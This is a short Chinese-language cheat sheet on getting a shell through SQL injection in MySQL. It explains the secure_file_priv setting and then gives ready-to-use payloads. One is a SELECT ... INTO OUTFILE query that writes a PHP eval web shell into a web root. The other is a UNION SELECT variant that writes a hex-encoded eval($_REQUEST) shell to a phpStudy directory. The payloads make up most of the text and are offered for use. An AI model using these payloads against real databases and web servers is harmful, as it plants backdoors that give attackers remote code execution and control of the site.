sql注入

目录

• getshell
  • into outfile
  • into outfile（hex）

getshell

into outfile

show global variables like '%secure%';

secure_file_priv的值为null ，表示限制mysqld 不允许导入|导出

当secure_file_priv的值为/tmp/ ，表示限制mysqld 的导入|导出只能发生在/tmp/目录下

当secure_file_priv的值没有具体值时，表示不对mysqld 的导入|导出做限制

select '\<?php eval(\$_POST[yyj]);?>' into outfile "C/phpstudy/www/shell.php";

into outfile（hex）

union select 1,0x3c3f706870206576616c28245f524551554553545b315d293b3f3e,3 into outfile 'C:\xxxxxx\phpStudy\WWW\outfile.php'

其中0x3c3f706870206576616c28245f524551554553545b315d293b3f3e是\<?php eval(\$_REQUEST[123]);?> 的hex编码